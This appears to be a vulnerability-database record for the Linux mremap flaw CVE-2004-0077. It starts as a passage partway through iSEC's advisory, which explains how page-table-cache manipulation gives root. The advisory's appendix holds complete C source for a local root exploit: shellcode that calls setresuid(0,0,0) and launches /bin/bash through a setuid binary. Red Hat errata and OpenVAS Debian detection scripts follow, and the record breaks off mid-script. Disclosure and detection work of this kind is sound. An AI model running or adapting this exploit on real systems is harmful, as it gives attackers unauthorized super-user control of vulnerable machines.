unmaps a \nsufficiently big area of memory covering those ownerless PTEs, the underlying \npage table frame will be inserted into the page table cache but will still \ncontain valid PTEs. That means that on the next page table frame allocation \ninside process P for an address A our PTEs will appear in the page table of the \nprocess P! If that process tries to access the virtual memory at the address A \nthere won't be also a page fault if the PTEs have appropriate (read or write) \naccess rights. In other words: through the page table cache we are able to \ninsert any data into the virtual memory space of another process. \n \nOur code takes the way through a setuid binary, however this is not the only one \npossibility. We prepare the page table cache so that there is a single empty \npage frame in front of the cache and then a special page table containing 'self \nexecuting' pages. To fully understand how it works we must dig into the execve() \nsystem call. \n \nIf an user calls execve() the kernel removes all traces of the current \nexecutable including the virtual memory areas and page tables allocated to the \nprocess. Then a new VMA for the stack on top of the virtual memory is created \nwhere the program environment and arguments to the new binary are stored (they \nhave been preserved in kernel memory). This causes a first page table frame to \nbe allocated for the virtual memory region ranging from 0xbfc00000-0xc0000000. \n \nAs next the .text and .data sections of the binary to be executed as well as the \nprogram interpreter responsible for further loading are mapped into the fresh \nvirtual memory space. For the ELF linking format this is usually the ld.so \ndynamic linker. At this point the kernel does not allocate the underlying page \ntables. Only VMA descriptors are inserted into the process's VMA list. \n \nAfter doing some more work not important for the following the kernel transfers \ncontrol to the dynamic linker to execute the binary. This causes a second page \nfault and triggers demand loading of the first code page of the dynamic linker. \nOn a standard Linux kernel this will also allocate a page frame for the page \ntable ranging from 0x40000000 to 0x40400000. \n \nOn a kernel with page table cache enabled both allocations will take page frames \nfrom the cache first. That means that if the second page in the cached page list \ncontains valid PTEs those could appear instead of the regular dynamic linker \ncode. It is easy to place the PTEs so that they will shadow the code section of \nthe dynamic linker. Note that the first PTE entry of a page is used by the cache \ncode to maintain the page list. In our code we populate the page table cache \nwith special frames containing PTEs to pages with a short shell code at the end \nof the page and fill the pages with a NOP landing zone. \n \nWe must also mention that the first mremap hole disclosed on 05-01-2004 can be \nalso very easily exploited through the page table cache. Details are left for \nthe skilled reader. \n \nA second possibility to exploit the mremap bug is to create another VMA covering \nownerless PTEs from a read-only file like /etc/passwd. \n \n \nImpact: \n======= \n \nSince no special privileges are required to use the mremap(2) system call any \nprocess may use its unexpected behavior to disrupt the kernel memory management \nsubsystem. \n \nProper exploitation of this vulnerability leads to local privilege escalation \ngiving an attacker full super-user privileges. The vulnerability may also lead \nto a denial-of-service attack on the available system memory. \n \nTested and known to be vulnerable kernel versions are all <= 2.2.25, <= 2.4.24 \nand <= 2.6.2. The 2.2.25 version of Linux kernel does not recognize the \nMREMAP_FIXED flag but this does not prevent the bug from being successfully \nexploited. All users are encouraged to patch all vulnerable systems as soon as \nappropriate vendor patches are released. There is no hotfix for this \nvulnerability. Limited per user virtual memory still permits do_munmap() to \nfail. \n \n \nCredits: \n======== \n \nPaul Starzetz <ihaquer@isec.pl> has identified the vulnerability and performed \nfurther research. COPYING, DISTRIBUTION, AND MODIFICATION OF INFORMATION \nPRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF ONE OF THE AUTHORS. \n \n \nDisclaimer: \n=========== \n \nThis document and all the information it contains are provided \"as is\", for \neducational purposes only, without warranty of any kind, whether express or \nimplied. \n \nThe authors reserve the right not to be responsible for the topicality, \ncorrectness, completeness or quality of the information provided in this \ndocument. Liability claims regarding damage caused by the use of any information \nprovided, including any kind of information which is incomplete or incorrect, \nwill therefore be rejected. \n \n \nAppendix: \n========= \n \n/* \n* \n* mremap missing do_munmap return check kernel exploit \n* \n* gcc -O3 -static -fomit-frame-pointer mremap_pte.c -o mremap_pte \n* ./mremap_pte [suid] [[shell]] \n* \n* Copyright (c) 2004 iSEC Security Research. All Rights Reserved. \n* \n* THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY* IT IS PROVIDED \"AS IS\" \n* AND WITHOUT ANY WARRANTY. COPYING, PRINTING, DISTRIBUTION, MODIFICATION \n* WITHOUT PERMISSION OF THE AUTHOR IS STRICTLY PROHIBITED. \n* \n*/ \n \n#include <stdio.h> \n#include <stdlib.h> \n#include <errno.h> \n#include <unistd.h> \n#include <syscall.h> \n#include <signal.h> \n#include <time.h> \n#include <sched.h> \n \n#include <sys/mman.h> \n#include <sys/wait.h> \n#include <sys/utsname.h> \n \n#include <asm/page.h> \n \n \n#define str(s) #s \n#define xstr(s) str(s) \n \n// this is for standard kernels with 3/1 split \n#define STARTADDR 0x40000000 \n#define PGD_SIZE (PAGE_SIZE * 1024) \n#define VICTIM (STARTADDR + PGD_SIZE) \n#define MMAP_BASE (STARTADDR + 3*PGD_SIZE) \n \n#define DSIGNAL SIGCHLD \n#define CLONEFL (DSIGNAL|CLONE_VFORK|CLONE_VM) \n \n#define MREMAP_MAYMOVE ( (1UL) << 0 ) \n#define MREMAP_FIXED ( (1UL) << 1 ) \n \n#define __NR_sys_mremap __NR_mremap \n \n \n// how many ld.so pages? this is the .text section length (like cat \n// /proc/self/maps) in pages \n#define LINKERPAGES 0x14 \n \n// suid victim \nstatic char *suid=\"/bin/ping\"; \n \n// shell to start \nstatic char *launch=\"/bin/bash\"; \n \n \n_syscall5(ulong, sys_mremap, ulong, a, ulong, b, ulong, c, ulong, d, \nulong, e); \nunsigned long sys_mremap(unsigned long addr, unsigned long old_len, \nunsigned long new_len, unsigned long flags, \nunsigned long new_addr); \n \nstatic volatile unsigned base, *t, cnt, old_esp, prot, victim=0; \nstatic int i, pid=0; \nstatic char *env[2], *argv[2]; \nstatic ulong ret; \n \n \n// code to appear inside the suid image \nstatic void suid_code(void) \n{ \n__asm__( \n\" call callme \\n\" \n \n// setresuid(0, 0, 0), setresgid(0, 0, 0) \n\"jumpme: xorl %ebx, %ebx \\n\" \n\" xorl %ecx, %ecx \\n\" \n\" xorl %edx, %edx \\n\" \n\" xorl %eax, %eax \\n\" \n\" mov $\"xstr(__NR_setresuid)\", %al \\n\" \n\" int $0x80 \\n\" \n\" mov $\"xstr(__NR_setresgid)\", %al \\n\" \n\" int $0x80 \\n\" \n \n// execve(launch) \n\" popl %ebx \\n\" \n\" andl $0xfffff000, %ebx \\n\" \n\" xorl %eax, %eax \\n\" \n\" pushl %eax \\n\" \n\" movl %esp, %edx \\n\" \n\" pushl %ebx \\n\" \n\" movl %esp, %ecx \\n\" \n\" mov $\"xstr(__NR_execve)\", %al \\n\" \n\" int $0x80 \\n\" \n \n// exit \n\" xorl %eax, %eax \\n\" \n\" mov $\"xstr(__NR_exit)\", %al \\n\" \n\" int $0x80 \\n\" \n \n\"callme: jmp jumpme \\n\" \n); \n} \n \n \nstatic int suid_code_end(int v) \n{ \nreturn v+1; \n} \n \n \nstatic inline void get_esp(void) \n{ \n__asm__( \n\" movl %%esp, %%eax \\n\" \n\" andl $0xfffff000, %%eax \\n\" \n\" movl %%eax, %0 \\n\" \n: : \"m\"(old_esp) \n); \n} \n \n \nstatic inline void cloneme(void) \n{ \n__asm__( \n\" pusha \\n\" \n\" movl $(\"xstr(CLONEFL)\"), %%ebx \\n\" \n\" movl %%esp, %%ecx \\n\" \n\" movl $\"xstr(__NR_clone)\", %%eax \\n\" \n\" int $0x80 \\n\" \n\" movl %%eax, %0 \\n\" \n\" popa \\n\" \n: : \"m\"(pid) \n); \n} \n \n \nstatic inline void my_execve(void) \n{ \n__asm__( \n\" movl %1, %%ebx \\n\" \n\" movl %2, %%ecx \\n\" \n\" movl %3, %%edx \\n\" \n\" movl $\"xstr(__NR_execve)\", %%eax \\n\" \n\" int $0x80 \\n\" \n: \"=a\"(ret) \n: \"m\"(suid), \"m\"(argv), \"m\"(env) \n); \n} \n \n \nstatic inline void pte_populate(unsigned addr) \n{ \nunsigned r; \nchar *ptr; \n \nmemset((void*)addr, 0x90, PAGE_SIZE); \nr = ((unsigned)suid_code_end) - ((unsigned)suid_code); \nptr = (void*) (addr + PAGE_SIZE); \nptr -= r+1; \nmemcpy(ptr, suid_code, r); \nmemcpy((void*)addr, launch, strlen(launch)+1); \n} \n \n \n// hit VMA limit & populate PTEs \nstatic void exhaust(void) \n{ \n// mmap PTE donor \nt = mmap((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ|PROT_WRITE, \nMAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); \nif(MAP_FAILED==t) \ngoto failed; \n \n// prepare shell code pages \nfor(i=2; i<LINKERPAGES+1; i++) \npte_populate(victim + PAGE_SIZE*i); \ni = mprotect((void*)victim, PAGE_SIZE*(LINKERPAGES+3), PROT_READ); \nif(i) \ngoto failed; \n \n// lock unmap \nbase = MMAP_BASE; \ncnt = 0; \nprot = PROT_READ; \nprintf(\"\\n\"); fflush(stdout); \nfor(;;) { \nt = mmap((void*)base, PAGE_SIZE, prot, \nMAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, 0); \nif(MAP_FAILED==t) { \nif(ENOMEM==errno) \nbreak; \nelse \ngoto failed; \n} \nif( !(cnt%512) || cnt>65520 ) \nprintf(\"\\r MMAP #%d 0x%.8x - 0x%.8lx\", cnt, base, \nbase+PAGE_SIZE); fflush(stdout); \nbase += PAGE_SIZE; \nprot ^= PROT_EXEC; \ncnt++; \n} \n \n// move PTEs & populate page table cache \nret = sys_mremap(victim+PAGE_SIZE, LINKERPAGES*PAGE_SIZE, PAGE_SIZE, \nMREMAP_FIXED|MREMAP_MAYMOVE, VICTIM); \nif(-1==ret) \ngoto failed; \n \nmunmap((void*)MMAP_BASE, old_esp-MMAP_BASE); \nt = mmap((void*)(old_esp-PGD_SIZE-PAGE_SIZE), PAGE_SIZE, \nPROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, 0, \n0); \nif(MAP_FAILED==t) \ngoto failed; \n \n*t = *((unsigned *)old_esp); \nmunmap((void*)VICTIM-PAGE_SIZE, old_esp-(VICTIM-PAGE_SIZE)); \nprintf(\"\\n[+] Success\\n\\n\"); fflush(stdout); \nreturn; \n \nfailed: \nprintf(\"\\n[-] Failed\\n\"); fflush(stdout); \n_exit(0); \n} \n \n \nstatic inline void check_kver(void) \n{ \nstatic struct utsname un; \nint a=0, b=0, c=0, v=0, e=0, n; \n \nuname(&un); \nn=sscanf(un.release, \"%d.%d.%d\", &a, &b, &c); \nif(n!=3 || a!=2) { \nprintf(\"\\n[-] invalid kernel version string\\n\"); \n_exit(0); \n} \n \nif(b==2) { \nif(c<=25) \nv=1; \n} \nelse if(b==3) { \nif(c<=99) \nv=1; \n} \nelse if(b==4) { \nif(c>18 && c<=24) \nv=1, e=1; \nelse if(c>24) \nv=0, e=0; \nelse \nv=1, e=0; \n} \nelse if(b==5 && c<=75) \nv=1, e=1; \nelse if(b==6 && c<=2) \nv=1, e=1; \n \nprintf(\"\\n[+] kernel %s vulnerable: %s exploitable %s\", \nun.release, v? \"YES\" : \"NO\", e? \"YES\" : \"NO\" ); \nfflush(stdout); \n \nif(v && e) \nreturn; \n_exit(0); \n} \n \n \nint main(int ac, char **av) \n{ \n// prepare \ncheck_kver(); \nmemset(env, 0, sizeof(env)); \nmemset(argv, 0, sizeof(argv)); \nif(ac>1) suid=av[1]; \nif(ac>2) launch=av[2]; \nargv[0] = suid; \nget_esp(); \n \n// mmap & clone & execve \nexhaust(); \ncloneme(); \nif(!pid) { \nmy_execve(); \n} else { \nwaitpid(pid, 0, 0); \n} \n \nreturn 0; \n} \n \n- -- \nPaul Starzetz \niSEC Security Research \nhttp://isec.pl/ \n \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.0.7 (GNU/Linux) \n \niD8DBQFAQ3a/C+8U3Z5wpu4RAtOFAKCtT8EM9zn5n/maQlSwTZu2wkdHawCfYlht \nWdUJcKDwAzO44Dpmc9IqiEs= \n=mMKN \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/32797/isec-0014-mremap-unmap.v2.txt"}], "redhat": [{"lastseen": "2019-08-13T18:46:36", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0077"], "description": "The Linux kernel handles the basic functions of the operating\nsystem.\n\nPaul Starzetz discovered a flaw in return value checking in mremap() in the\nLinux kernel versions 2.4.24 and previous that may allow a local attacker\nto gain root privileges. No exploit is currently available; however this\nissue is exploitable. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues. \n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this issue.\n\nFor the IBM S/390 and IBM eServer zSeries architectures, the upstream\nversion of the s390utils package (which fixes a bug in the zipl\nbootloader) is also included.", "modified": "2017-07-29T20:33:24", "published": "2004-02-20T05:00:00", "id": "RHSA-2004:066", "href": "https://access.redhat.com/errata/RHSA-2004:066", "type": "redhat", "title": "(RHSA-2004:066) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:32:42", "bulletinFamily": "unix", "cvelist": ["CVE-2003-1040", "CVE-2004-0010", "CVE-2004-0077"], "description": "The Linux kernel handles the basic functions of the operating\nsystem.\n\nPaul Starzetz discovered a flaw in return value checking in mremap() in the\nLinux kernel versions 2.4.24 and previous that may allow a local attacker\nto gain root privileges. No exploit is currently available; however this\nissue is exploitable. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nArjan van de Ven discovered a flaw in ncp_lookup() in ncpfs that could\nallow local privilege escalation. ncpfs is only used to allow a system to\nmount volumes of NetWare servers or print to NetWare printers. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0010 to this issue.\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues. \n\nRed Hat would like to thank Paul Starzetz from ISEC for reporting this\nissue CAN-2004-0077.", "modified": "2018-03-14T19:26:52", "published": "2004-03-05T05:00:00", "id": "RHSA-2004:069", "href": "https://access.redhat.com/errata/RHSA-2004:069", "type": "redhat", "title": "(RHSA-2004:069) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-11T13:31:09", "bulletinFamily": "unix", "cvelist": ["CVE-2002-1574", "CVE-2003-1040", "CVE-2004-0003", "CVE-2004-0010", "CVE-2004-0077", "CVE-2004-0109"], "description": "The Linux kernel handles the basic functions of the operating system.\n\nThis kernel updates several important drivers and fixes a number of bugs\nincluding potential security vulnerabilities.\n\niDefense reported a buffer overflow flaw in the ISO9660 filesystem code.\nAn attacker could create a malicious filesystem in such a way that root\nprivileges may be obtained if the filesystem is mounted. The Common\nVulnerabilities and Exposures project (cve.mitre.org) has assigned the name\nCAN-2004-0109 to this issue.\n\nA flaw in return value checking in mremap() in the Linux kernel versions\n2.4.24 and previous that may allow a local attacker to gain root\nprivileges. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2004-0077 to this issue.\n\nA flaw in ncp_lookup() in ncpfs could allow local privilege escalation.\nThe ncpfs module allows a system to mount volumes of NetWare servers or\nprint to NetWare printers. This is part of the kernel-unsupported package.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CAN-2004-0010 to this issue.\n\nA flaw in the R128 Direct Render Infrastructure could allow local privilege\nescalation. This driver is part of the kernel-unsupported package. The\nCommon Vulnerabilities and Exposures project (cve.mitre.org) has assigned\nthe name CAN-2004-0003 to this issue.\n\nAn overflow was found in the ixj telephony card driver in Linux kernels\nprior to 2.4.20. The Common Vulnerabilities and Exposures project\n(cve.mitre.org) has assigned the name CAN-2002-1574 to this issue.\n\nThe following drivers were updated:\n\nIBM Serveraid 6.11.07\nMPT fusion v. 2.05.11.03\nQlogic v. 6.07.02-RH1\n\nAll users are advised to upgrade to these errata packages, which contain\nbackported security patches that correct these issues.", "modified": "2018-03-14T19:27:37", "published": "2004-04-21T04:00:00", "id": "RHSA-2004:106", "href": "https://access.redhat.com/errata/RHSA-2004:106", "type": "redhat", "title": "(RHSA-2004:106) kernel security update", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-07-24T12:49:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nannounced via advisory DSA 456-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53154", "href": "http://plugins.openvas.org/nasl.php?oid=53154", "type": "openvas", "title": "Debian Security Advisory DSA 456-1 (kernel)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_456_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 456-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 20040303 of 2.2 kernel images for the arm architecture.\n\nFor the unstable distribution (sid) this problem will be fixed soon\nfor the architectures that still ship a 2.2.x kernel package.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.19, kernel-patch-2.2.19-arm, kernel-image-2.2.19-netwinder, kernel-image-2.2.19-riscpc\nannounced via advisory DSA 456-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20456-1\";\n\nif(description)\n{\n script_id(53154);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 456-1 (kernel)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.19\", ver:\"2.2.19.1-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.19\", ver:\"2.2.19.1-4woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-patch-2.2.19-arm\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.19\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.19-netwinder\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.19-riscpc\", ver:\"20040303\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:49:47", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2-sparc\nannounced via advisory DSA 514-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53205", "href": "http://plugins.openvas.org/nasl.php?oid=53205", "type": "openvas", "title": "Debian Security Advisory DSA 514-1 (kernel-source-2.2.20, kernel-image-2.2-sparc)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_514_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 514-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to flushing the TLB (Translation\nLookaside Buffer, an address cache) too early it is possible for an\nattacker to trigger a local root exploit.\n\nThe attack vectors for 2.4.x and 2.2.x kernels are exclusive for the\nrespective kernel series, though. We formerly believed that the\nexploitable vulnerability in 2.4.x does not exist in 2.2.x which is\nstill true. However, it turned out that a second (sort of)\nvulnerability is indeed exploitable in 2.2.x, but not in 2.4.x, with a\ndifferent exploit, of course.\n\nFor the stable distribution (woody) these problems have been fixed in\nversion 9woody1 of Linux 2.2 kernel images for the sparc architecture\nand in version 2.2.20-5woody3 of Linux 2.2.20 source.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 9.1 of Linux 2.2 kernel images for the sparc architecture.\n\nThis problem has been fixed for other architectures already.\n\nWe recommend that you upgrade your Linux kernel package.\";\ntag_summary = \"The remote host is missing an update to kernel-source-2.2.20, kernel-image-2.2-sparc\nannounced via advisory DSA 514-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20514-1\";\n\nif(description)\n{\n script_id(53205);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:45:44 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 514-1 (kernel-source-2.2.20, kernel-image-2.2-sparc)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"kernel-doc-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-source-2.2.20\", ver:\"2.2.20-5woody3\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-headers-2.2.20-sparc\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4cdm\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4dm-smp\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4u\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"kernel-image-2.2.20-sun4u-smp\", ver:\"9woody1\", rls:\"DEB3.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-24T12:50:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0077"], "description": "The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 444-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "id": "OPENVAS:53143", "href": "http://plugins.openvas.org/nasl.php?oid=53143", "type": "openvas", "title": "Debian Security Advisory DSA 444-1 (kernel-image-2.4.17-ia64)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_444_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 444-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Paul Starzetz and Wojciech Purczynski of isec.pl discovered a critical\nsecurity vulnerability in the memory management code of Linux inside\nthe mremap(2) system call. Due to missing function return value check\nof internal functions a local attacker can gain root privileges.\n\nFor the stable distribution (woody) this problem has been fixed in\nversion 011226.16 of ia64 kernel source and images.\n\nOther architectures are or will be mentioned in a separate advisory\nrespectively or are not affected (m68k).\n\nFor the unstable distribution (sid) this problem will be fixed in version\n2.4.24-3.\n\nThis problem is also fixed in the upstream version of Linux 2.4.25 and\n2.6.3.\n\nWe recommend that you upgrade your Linux kernel packages immediately.\";\ntag_summary = \"The remote host is missing an update to kernel-image-2.4.17-ia64\nannounced via advisory DSA 444-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%20444-1\";\n\nif(description)\n{\n script_id(53143);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 22:41:51 +0100 (Thu, 17 Jan 2008)\");\n script_bugtraq_id(9686);\n script_cve_id(\"CVE-2004-0077\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 444-1 (kernel-image-2.4.17-ia64)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2005 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 